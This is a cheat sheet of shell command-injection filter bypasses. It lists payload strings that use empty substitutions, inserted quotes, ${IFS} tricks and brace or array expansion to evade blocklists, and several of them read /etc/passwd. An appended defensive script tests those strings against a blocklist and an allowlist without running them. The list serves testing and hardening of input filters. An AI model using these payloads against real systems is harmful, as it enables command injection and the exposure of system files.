Filter bypasses

Various ways to bypass filters that look for particular strings in input being fed to a shell

$() - an empty command substitution that expands to nothing, so it can be inserted into the middle of a command name, e.g. i$()d, to bypass filters
Empty quotes work the same way: i''d and i""d
who'a'mi
l``s
who${}ami
who$(:)ami
whoa\mi
&& || | ;
`` $()

Space bypasses

Ways to bypass filters that won't allow spaces

These work in bash as a substitute for a space, but not in zsh:

cat${IFS}/etc/passwd
ls${IFS%??}-lart
{ls,-lart}
ls$IFS-lart
ls${IFS:0:1}-lart
L=ls;B=-lart;{$L,$B}
L=ls;B=-lart;{${L},${B}}
L=ls;B=-lart;${L}${IFS:0:1}${B}

This works on both zsh and bash

A[1]=ls;A[2]=-lart;${A[*]}

A[1]=cat;A[2]=/etc/passwd;${A[*]}
A[1]=cat;A[2]=/etc/passwd;${A[@]}

Claimed to work but didn't in my testing

CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20/etc/passwd'&&cat$CMD
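
Both lists above work because the filter matches substrings or spaces while the shell re-parses the input afterwards. As an added example (not from the original page), the script below runs eight of the page's strings through a hypothetical substring blocklist and through a character allowlist; the function names and the blocklist contents are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: constructed validators, not code from the original page.
# Nothing here executes the sample strings; they are only matched as text.

# Hypothetical blocklist (assumption): reject input containing
# "whoami", "id", or any whitespace character.
blocklist_ok() {
    case "$1" in
        *whoami*|*id*|*[[:space:]]*) return 1 ;;
    esac
    return 0
}

# Allowlist: accept only a non-empty string of letters, digits, '.', '_'
# and '-' that does not start with '-' (so it cannot be read as an option).
allowlist_ok() {
    case "$1" in
        ''|-*|*[![:alnum:]._-]*) return 1 ;;
    esac
    return 0
}

# Strings copied from the lists on this page. The quoted heredoc delimiter
# keeps them literal, so no substitution or expansion takes place.
page_samples() {
    cat <<'EOF'
i$()d
i''d
who'a'mi
l``s
who$(:)ami
whoa\mi
cat${IFS}/etc/passwd
{ls,-lart}
EOF
}

# Count how many of the page samples the validator named in $1 accepts.
count_accepted() {
    page_samples | {
        n=0
        while IFS= read -r s; do
            if "$1" "$s"; then n=$((n + 1)); fi
        done
        echo "$n"
    }
}

echo "blocklist accepts $(count_accepted blocklist_ok) of 8 page samples"
echo "allowlist accepts $(count_accepted allowlist_ok) of 8 page samples"
```

An allowlist check like this complements, and does not replace, passing the value as a single quoted argument instead of building a command string for the shell to re-parse.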